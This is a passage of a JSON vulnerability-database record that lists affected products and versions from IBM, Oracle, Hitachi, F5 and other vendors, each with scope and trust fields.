"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.5.1.7"
},
{
"_id": null,
"model": "websphere lombardi edition",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1.0"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.0"
},
{
"_id": null,
"model": "lotus expeditor",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2.2"
},
{
"_id": null,
"model": "device manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"_id": null,
"model": "device manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-07"
},
{
"_id": null,
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5"
},
{
"_id": null,
"model": "tivoli provisioning manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1"
},
{
"_id": null,
"model": "arx",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "6.0"
},
{
"_id": null,
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.2.1"
},
{
"_id": null,
"model": "tuning manager software (linux(suse",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"_id": null,
"model": "websphere sensor events",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"_id": null,
"model": "openpages",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0.1.5"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.1.0"
},
{
"_id": null,
"model": "security threat response manager",
"scope": "eq",
"trust": 0.3,
"vendor": "juniper",
"version": "2012.1"
},
{
"_id": null,
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.2"
},
{
"_id": null,
"model": "xp p9000 replication manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "6.0.0-00"
},
{
"_id": null,
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0.10"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.2.1-00"
},
{
"_id": null,
"model": "qradar siem mr2",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1"
},
{
"_id": null,
"model": "arx",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "6.4"
},
{
"_id": null,
"model": "tivoli dynamic workload console",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"_id": null,
"model": "big-ip edge gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.1"
},
{
"_id": null,
"model": "websphere service registry and repository",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0"
},
{
"_id": null,
"model": "tivoli workload scheduler distributed",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.1"
},
{
"_id": null,
"model": "filenet p8 platform content search engine",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1"
},
{
"_id": null,
"model": "tivoli identity manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.0"
},
{
"_id": null,
"model": "tivoli netcool/omnibus web gui",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.4"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.0.35"
},
{
"_id": null,
"model": "tuning manager software (solaris(x6",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"_id": null,
"model": "tivoli composite application manager for websphere",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1"
},
{
"_id": null,
"model": "tiered storage manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-08"
},
{
"_id": null,
"model": "ds8870",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.3"
},
{
"_id": null,
"model": "raplication manager software (linux(suse",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"_id": null,
"model": "tuning manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.001"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.5"
},
{
"_id": null,
"model": "qradar siem mr5",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"_id": null,
"model": "communications webrtc session controller",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.0"
},
{
"_id": null,
"model": "arx",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "6.3"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.07"
},
{
"_id": null,
"model": "infosphere identity insight",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.0.3"
},
{
"_id": null,
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"_id": null,
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.3"
},
{
"_id": null,
"model": "retail allocation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.0"
},
{
"_id": null,
"model": "infosphere master data management collaborative edition",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "-10.0"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.1.1-00"
},
{
"_id": null,
"model": "qradar siem mr2",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2"
},
{
"_id": null,
"model": "device manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-08"
},
{
"_id": null,
"model": "device manager software",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-06"
},
{
"_id": null,
"model": "business process manager express",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.5"
},
{
"_id": null,
"model": "endpoint manager for remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1.0"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.0.39"
},
{
"_id": null,
"model": "vcenter server",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "5.0"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.1.0-00"
},
{
"_id": null,
"model": "predictive insight",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"_id": null,
"model": "big-ip edge gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.4"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.23"
},
{
"_id": null,
"model": "social media analytics",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.2"
},
{
"_id": null,
"model": "device manager software (linux(sles",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-07"
},
{
"_id": null,
"model": "tivoli integrated portal",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2"
},
{
"_id": null,
"model": "arx",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "6.2"
},
{
"_id": null,
"model": "tivoli workload scheduler distributed",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.4"
},
{
"_id": null,
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"_id": null,
"model": "global link manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-01"
},
{
"_id": null,
"model": "retail allocation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.2"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.15"
},
{
"_id": null,
"model": "device manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.1.1-03"
},
{
"_id": null,
"model": "tivoli workload scheduler z/os connector",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.1"
},
{
"_id": null,
"model": "application manager for smart business",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.2.1"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.31"
},
{
"_id": null,
"model": "jdeveloper",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.1.3.5.0"
},
{
"_id": null,
"model": "lotus expeditor",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2.3"
},
{
"_id": null,
"model": "big-ip aam",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.5.1"
},
{
"_id": null,
"model": "device manager software (linux(rhel",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-06"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-09-00-08"
},
{
"_id": null,
"model": "linux ia-64",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.0"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-08-11-01"
},
{
"_id": null,
"model": "business process manager standard",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.0"
},
{
"_id": null,
"model": "big-ip edge gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.0"
},
{
"_id": null,
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.2.0.3.0"
},
{
"_id": null,
"model": "device manager software (solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.1.1-03(x64))"
},
{
"_id": null,
"model": "retail back office 12.0.9in",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "device manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.0-00"
},
{
"_id": null,
"model": "tivoli netcool configuration manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.4"
},
{
"_id": null,
"model": "real-time decision platform",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.0"
},
{
"_id": null,
"model": "filenet content manager content engine",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.2.0"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.2"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-09-10"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-09-00-07"
},
{
"_id": null,
"model": "tiered storage manager software (linux(sles",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.1.0-00"
},
{
"_id": null,
"model": "network satellite server (for rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6)5.5"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.0.31"
},
{
"_id": null,
"model": "filenet p8 platform content search engine",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.5.1"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.05"
},
{
"_id": null,
"model": "infosphere master data management collaborative edition",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "-11.0"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.55"
},
{
"_id": null,
"model": "tivoli netcool configuration manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.3"
},
{
"_id": null,
"model": "security qradar",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2.2"
},
{
"_id": null,
"model": "tivoli foundations for application manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.2"
},
{
"_id": null,
"model": "infosphere master data management server for product information",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"_id": null,
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1"
},
{
"_id": null,
"model": "infosphere information server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0"
},
{
"_id": null,
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.5.0.0"
},
{
"_id": null,
"model": "identity manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.5"
},
{
"_id": null,
"model": "waveset",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.1.1"
},
{
"_id": null,
"model": "tivoli identity manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1"
},
{
"_id": null,
"model": "big-ip edge gateway hf3",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2"
},
{
"_id": null,
"model": "big-ip aam",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.4.0"
},
{
"_id": null,
"model": "network satellite server (for rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6)5.4"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-08-11"
},
{
"_id": null,
"model": "jdeveloper",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.24.0"
},
{
"_id": null,
"model": "tiered storage manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"_id": null,
"model": "tivoli netcool configuration manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-08-00-11"
},
{
"_id": null,
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1.1.4"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-06"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.402"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.2.1-00"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.2.1-01"
},
{
"_id": null,
"model": "big-ip aam",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.4.1"
},
{
"_id": null,
"model": "tiered storage manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.1-02"
},
{
"_id": null,
"model": "big-ip webaccelerator",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.00"
},
{
"_id": null,
"model": "secure analytics 2012.1r7",
"scope": "ne",
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-03"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.1-00"
},
{
"_id": null,
"model": "device manager software (solaris(op",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.4.0-00"
},
{
"_id": null,
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1.1.2"
},
{
"_id": null,
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0"
},
{
"_id": null,
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.0"
},
{
"_id": null,
"model": "insurance ifrs analyzer",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "178.0.7"
},
{
"_id": null,
"model": "smart analytics system",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "56001"
},
{
"_id": null,
"model": "financial transaction manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.1"
},
{
"_id": null,
"model": "tivoli storage manager administration center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2"
},
{
"_id": null,
"model": "rational insight",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.0.11"
},
{
"_id": null,
"model": "retail markdown optimization",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1"
},
{
"_id": null,
"model": "secure analytics",
"scope": "eq",
"trust": 0.3,
"vendor": "juniper",
"version": "2013.2"
},
{
"_id": null,
"model": "big-ip edge gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.1"
},
{
"_id": null,
"model": "websphere lombardi edition",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2"
},
{
"_id": null,
"model": "distributed marketing",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.2"
},
{
"_id": null,
"model": "infosphere balanced warehouse c4000",
"scope": null,
"trust": 0.3,
"vendor": "ibm",
"version": null
},
{
"_id": null,
"model": "device manager software (solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.1-00(x64))"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.0.33"
},
{
"_id": null,
"model": "fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.17.0"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.03"
},
{
"_id": null,
"model": "sitescope",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "11.24"
},
{
"_id": null,
"model": "rational reporting for development intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0.5"
},
{
"_id": null,
"model": "websphere partner gateway express edition",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0.0.3"
},
{
"_id": null,
"model": "tiered storage manager software (linux(sles",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.1-02"
},
{
"_id": null,
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.4"
},
{
"_id": null,
"model": "retail markdown optimization",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.0"
},
{
"_id": null,
"model": "terasoluna server framework for java",
"scope": "eq",
"trust": 0.3,
"vendor": "ntt data",
"version": "2.0.51"
},
{
"_id": null,
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.3"
},
{
"_id": null,
"model": "distributed marketing",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"_id": null,
"model": "tiered storage manager software (linux(sles",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-08"
},
{
"_id": null,
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.2.2.177"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.0.45"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.01"
},
{
"_id": null,
"model": "big-ip webaccelerator",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"_id": null,
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0.0.0"
},
{
"_id": null,
"model": "tuning manager software (linux(suse",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-06"
},
{
"_id": null,
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.1.0.1.0"
},
{
"_id": null,
"model": "communications metasolv solution",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.2.10.0"
},
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.0"
},
{
"_id": null,
"model": "filenet p8 platform content search engine",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.0"
},
{
"_id": null,
"model": "raplication manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"_id": null,
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5"
},
{
"_id": null,
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.0"
},
{
"_id": null,
"model": "big-ip edge gateway hf2",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"_id": null,
"model": "retail invoice matching",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.2"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.06"
},
{
"_id": null,
"model": "portal",
"scope": "eq",
"trust": 0.3,
"vendor": "liferay",
"version": "6.2.1"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.02"
},
{
"_id": null,
"model": "big-ip edge gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.1"
},
{
"_id": null,
"model": "business process manager standard",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.0"
},
{
"_id": null,
"model": "xp7 global link manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "7.6.0-02"
},
{
"_id": null,
"model": "secure analytics 2014.2r2",
"scope": "ne",
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"_id": null,
"model": "rational reporting for development intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.01"
},
{
"_id": null,
"model": "big-ip webaccelerator hf5",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.0"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.09"
},
{
"_id": null,
"model": "rational reporting for development intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.0.21"
},
{
"_id": null,
"model": "raplication manager software (linux(suse",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-06"
},
{
"_id": null,
"model": "tivoli integrated portal",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.1.115"
},
{
"_id": null,
"model": "retail invoice matching",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.1"
},
{
"_id": null,
"model": "tivoli application dependency discovery manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2.2"
},
{
"_id": null,
"model": "linux mips",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "tiered storage manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.1.0-00"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.19"
},
{
"_id": null,
"model": "portal 6.2.1-ce-ga2-securit",
"scope": null,
"trust": 0.3,
"vendor": "liferay",
"version": null
},
{
"_id": null,
"model": "tivoli dynamic workload console",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.1"
},
{
"_id": null,
"model": "tiered storage manager software (linux(sles",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.3.0-00"
},
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.2"
},
{
"_id": null,
"model": "big-ip edge gateway hf1",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.1"
},
{
"_id": null,
"model": "fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.21.0"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"_id": null,
"model": "struts",
"scope": "ne",
"trust": 0.3,
"vendor": "apache",
"version": "2.3.16.2"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.25"
},
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.4"
},
{
"_id": null,
"model": "leads",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"_id": null,
"model": "device manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.1.0-00"
},
{
"_id": null,
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.3.0.2.0"
},
{
"_id": null,
"model": "infosphere balanced warehouse d5100",
"scope": null,
"trust": 0.3,
"vendor": "ibm",
"version": null
},
{
"_id": null,
"model": "tiered storage manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"_id": null,
"model": "security threat response manager 2013.2r8",
"scope": "ne",
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"_id": null,
"model": "tivoli system automation application manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.2"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.3"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.08"
},
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "15.2"
},
{
"_id": null,
"model": "tuning manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.401"
},
{
"_id": null,
"model": "big-ip webaccelerator hf3",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"_id": null,
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.0"
},
{
"_id": null,
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1.1.0"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.0-00"
},
{
"_id": null,
"model": "business process manager express",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.0"
},
{
"_id": null,
"model": "device manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0-00"
},
{
"_id": null,
"model": "device manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"_id": null,
"model": "global link manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.3"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"_id": null,
"model": "distributed marketing",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.6"
},
{
"_id": null,
"model": "knowledge",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.6.1"
},
{
"_id": null,
"model": "tiered storage manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.0-00"
},
{
"_id": null,
"model": "sitescope",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "11.2"
},
{
"_id": null,
"model": "enterprise server x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "5"
},
{
"_id": null,
"model": "raplication manager software (solaris(x6",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"_id": null,
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.0.1.0"
},
{
"_id": null,
